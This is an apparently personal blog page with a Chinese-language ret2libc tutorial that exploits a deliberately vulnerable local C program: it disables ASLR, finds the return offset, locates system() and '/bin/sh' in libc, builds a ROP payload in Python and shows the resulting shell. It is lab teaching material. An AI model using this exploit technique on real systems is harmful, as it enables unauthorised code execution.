<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <!--[if lte IE 9]><meta http-equiv="refresh" content="0;url=/ie.html"><![endif]--> <meta name="author" content="void0red"> <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,400italic,600|Droid+Sans+Mono' rel='stylesheet' type='text/css'> <link rel="shortcut icon" href="/assets/img/favicon.png" /> <link rel="stylesheet" href="/css/main.css"> <link rel="canonical" href="http://localhost:4000/2017/11/11/ret2libc.html"> <!-- Begin Jekyll SEO tag v2.3.0 --> <title>ret2libc | void0red’s blog</title> <meta property="og:title" content="ret2libc" /> <meta name="author" content="void0red" /> <meta property="og:locale" content="en_US" /> <meta name="description" content="this is a test not true" /> <meta property="og:description" content="this is a test not true" /> <link rel="canonical" href="http://localhost:4000/2017/11/11/ret2libc.html" /> <meta property="og:url" content="http://localhost:4000/2017/11/11/ret2libc.html" /> <meta property="og:site_name" content="void0red’s blog" /> <meta property="og:type" content="article" /> <meta property="article:published_time" content="2017-11-11T00:00:00+08:00" /> <script type="application/ld+json"> {"name":null,"description":"this is a test not true","author":{"@type":"Person","name":"void0red"},"@type":"BlogPosting","url":"http://localhost:4000/2017/11/11/ret2libc.html","publisher":null,"image":null,"headline":"ret2libc","dateModified":"2017-11-11T00:00:00+08:00","datePublished":"2017-11-11T00:00:00+08:00","sameAs":null,"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2017/11/11/ret2libc.html"},"@context":"http://schema.org"}</script> <!-- End Jekyll SEO tag --> <link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="" /> <script src="/assets/js/prefixfree.js"></script> </head> <body> <script type="text/javascript" color="0,255,128" opacity='1' src="/assets/js/canvas-nest.min.js"></script> <aside id="sidebar" class="open"> <div id="sidebar-left"> <a id="sidebar-avatar" href="/"> <img id="sidebar-avatar-img" alt="" src="/assets/img/avatar.jpg"/> </a> <div id="sidebar-social"> <a href="/pages/feed.xml" class="sidebar-social-icon feed"></a> <a href="mailto:void0red@gmail.com" class="sidebar-social-icon email"></a> <!-- Generate icon by yourself https://icomoon.io/app/#/select --> <a href="https://github.com/void0red" class="sidebar-social-icon github" target="_blank"></a> </div> <ul id="sidebar-tags"> <li class="sidebar-tag active" data-filter="recent">最新文章</li> <li class="sidebar-tag" data-filter="others">others</li> <li class="sidebar-tag" data-filter="c">c</li> <li class="sidebar-tag" data-filter="bin">bin</li> <li class="sidebar-tag" data-filter="pwn">pwn</li> </ul> <div> <object type="application/x-shockwave-flash" style="outline:none;" data="/pic/hamster.swf" width="120" height="90"><param name="movie" value="http://cdn.abowman.com/widgets/hamster/hamster.swf?"></param><param name="AllowScriptAccess" value="always"></param><param name="wmode" value="opaque"></param></object> </div> </div> <div id="sidebar-right"> <div id="search-box"> <input id="search-input" type="text" placeholder="Search" /> </div> <nav id="toc"> <a class="toc-link" data-tags="pwn" href="/2017/11/11/ret2libc.html"> ret2libc </a> <a class="toc-link" data-tags="pwn" href="/2017/11/09/overflow.html"> overflow </a> <a class="toc-link" data-tags="others" href="/2017/11/05/a-letter.html"> a letter </a> <a class="toc-link" data-tags="bin" href="/2017/10/21/try_assembly_0.html"> try_assembly_0 </a> <a class="toc-link" data-tags="others" href="/2017/10/13/Crawler.html"> Crawler Sharing </a> <a class="toc-link" data-tags="c" href="/2017/10/07/struct.html"> About learning c struct </a> <a class="toc-link" data-tags="c" href="/2017/10/07/linked_list.html"> About learning linked_list </a> <a class="toc-link" data-tags="others" href="/2017/09/24/mysql.html"> About learning MYSQL </a> </nav> </div> </aside> <main id="main" class="open"> <article class="post container"> <div class="post-meta"> <span class="post-meta-span date">2017 November 11</span> <span class="post-meta-span tag">pwn</span> </div> <h1 class="post-title">ret2libc</h1> <blockquote> <p>this is a test not true</p> </blockquote> <h2 id="0x00准备">0x00准备</h2> <ul> <li> <p>本次实验的机器为<code class="highlighter-rouge">Ubuntu 16.04.2 LTS</code>64位系统</p> </li> <li> <p>需要关闭ASLR，<code class="highlighter-rouge">echo 0 &gt; /proc/sys/kernel/randomize_va_space</code>，如果提示权限不够，可能需要用<code class="highlighter-rouge">su</code>提升权限</p> </li> <li> <p>用<code class="highlighter-rouge">gcc</code>编译需要关闭<code class="highlighter-rouge">stack-protector</code>，打开NX</p> </li> <li> <p>需要<code class="highlighter-rouge">gdb</code> <code class="highlighter-rouge">peda</code> <code class="highlighter-rouge">python2</code> <code class="highlighter-rouge">ROPgadget or Ropper</code></p> </li> <li> <p>攻击目标<code class="highlighter-rouge">test.c</code>， <code class="highlighter-rouge">gcc -g -fno-stack-protector -o test test.c</code></p> <div class="language-c highlighter-rouge"><pre class="highlight"><code><span class="cp">#include&lt;stdio.h&gt;
#include&lt;unistd.h&gt;
</span><span class="kt">int</span> <span class="n">main</span><span class="p">(){</span>
	<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">10</span><span class="p">];</span>
	<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="n">buf</span><span class="p">,</span><span class="mi">80</span><span class="p">);</span>
	<span class="n">puts</span><span class="p">(</span><span class="s">"23333</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div> </li> </ul> <h2 id="0x01分析">0x01分析</h2> <p>测试程序很明显存在一个溢出的漏洞，但不能够写入一段<code class="highlighter-rouge">shellcode</code>，然后运行，因为此时栈上的数据是不可执行的，也就是打开了NX，可以通过<code class="highlighter-rouge">checksec</code>来查看程序的保护情况</p> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ checksec 
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
</code></pre></div> <p>幸运的是可以使用<code class="highlighter-rouge">ret2libc</code>加上一点<code class="highlighter-rouge">ROP</code>，劫持程序执行流，让它运行<code class="highlighter-rouge">system()</code></p> <h2 id="0x02确定返回地址的偏移量">0x02确定返回地址的偏移量</h2> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ pattern_create 100 test.txt
Writing pattern of 100 chars to filename "test.txt"
gdb-peda$ r &lt; test.txt 
...
gdb-peda$ x/wx $rsp
0x7fffffffdd08:	0x44414128
gdb-peda$ pattern_offset 0x44414128
1145127208 found at offset: 24
</code></pre></div> <p>获得返回地址的偏移量24</p> <h2 id="0x03确定相关地址">0x03确定相关地址</h2> <div class="highlighter-rouge"><pre class="highlight"><code>gdb-peda$ p system
$1 = {&lt;text variable, no debug info&gt;} 0x7ffff7a52390 &lt;__libc_system&gt;
gdb-peda$ find '/bin/sh'
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b99d17 --&gt; 0x68732f6e69622f ('/bin/sh')
</code></pre></div> <p>因为关掉了<code class="highlighter-rouge">ASLR</code>所以动态链接库的地址不会变化，可以直接使用<code class="highlighter-rouge">system</code>函数的地址<code class="highlighter-rouge">0x7ffff7a52390</code>，字符串<code class="highlighter-rouge">/bin/sh</code>的地址<code class="highlighter-rouge">0x7ffff7b99d17</code></p> <h2 id="0x04构造rop链">0x04构造ROP链</h2> <p>还有一个需要解决的问题，怎样把<code class="highlighter-rouge">/bin/sh</code>传到<code class="highlighter-rouge">system</code>函数中去，在<code class="highlighter-rouge">linux64</code>的系统上，一般使用寄存器传递参数，按照<code class="highlighter-rouge">rdi,rsi,rdx,rcx,r8,r9</code>的顺序传递，如果参数过多，再用栈传递参数</p> <p>所以需要一个简短的ROP链<code class="highlighter-rouge">pop rdi;ret</code>，可以使用工具<code class="highlighter-rouge">Ropper</code> <code class="highlighter-rouge">ROPgadget</code>或者直接<code class="highlighter-rouge">objdump</code></p> <div class="highlighter-rouge"><pre class="highlight"><code>$ ROPgadget --binary test|grep pop|grep rdi
0x0000000000400603 : pop rdi ; ret
</code></pre></div> <h2 id="0x05编写payload">0x05编写payload</h2> <div class="language-python highlighter-rouge"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mi">24</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;Q'</span><span class="p">,</span> <span class="mh">0x400603</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;Q'</span><span class="p">,</span> <span class="mh">0x7ffff7b99d17</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;Q'</span><span class="p">,</span> <span class="mh">0x7ffff7a52390</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'test.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div> <p>整个流程大概是这样的：</p> <p>返回地址被<code class="highlighter-rouge">pop rdi</code>的地址覆盖，所以程序流被控制了，执行<code class="highlighter-rouge">pop rdi;ret</code>，把栈顶弹出到<code class="highlighter-rouge">rdi</code>中，栈顶现在是<code class="highlighter-rouge">/bin/sh</code>的地址，然后它的地址自然被传递到了<code class="highlighter-rouge">rdi</code>寄存器中，接着执行<code class="highlighter-rouge">ret</code>，栈顶被弹入到<code class="highlighter-rouge">rip</code>，也就是<code class="highlighter-rouge">system()</code>的地址被存入了<code class="highlighter-rouge">rip</code>，现在调用<code class="highlighter-rouge">system()</code>函数，参数存在<code class="highlighter-rouge">rdi</code>中</p> <h2 id="0x06测试">0x06测试</h2> <div class="highlighter-rouge"><pre class="highlight"><code>$ (cat test.txt;cat)|./test
23333

whoami
void0red
</code></pre></div> <p>可以看到get到了<code class="highlighter-rouge">shell</code></p> <h2 id="0x07总结">0x07总结</h2> <p>通过<code class="highlighter-rouge">ret2libc</code>可以绕过<code class="highlighter-rouge">NX</code></p> </article> <div class="footer"> <div class="container"> <p class="footer-entry">All content is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA</a></p> <p class="footer-entry">Buit with <a href="http://jekyllrb.com/" target="_blank">Jekyll</a> and <a href="https://github.com/P233/3-Jekyll" target="_blank">3-Jekyll theme</a> • Hosted on <a href="https://pages.github.com/" target="_blank">Github</a></p> </div> </div> </main> <button id="menu" class="open"> <span id="menu-icons"></span> </button> <button id="post-toc-menu"> <span id="post-toc-menu-icons"></span> </button> <div id="post-toc"> <span id="post-toc-title">Table of Contents</span> <ul id="post-toc-ul"></ul> </div> <script src="/assets/js/jquery-2.1.3.min.js"></script> <script src="/assets/js/jquery.pjax.js"></script> <script src="/assets/js/nprogress.js"></script> <script src="/assets/js/main.js"></script> </body> </html>
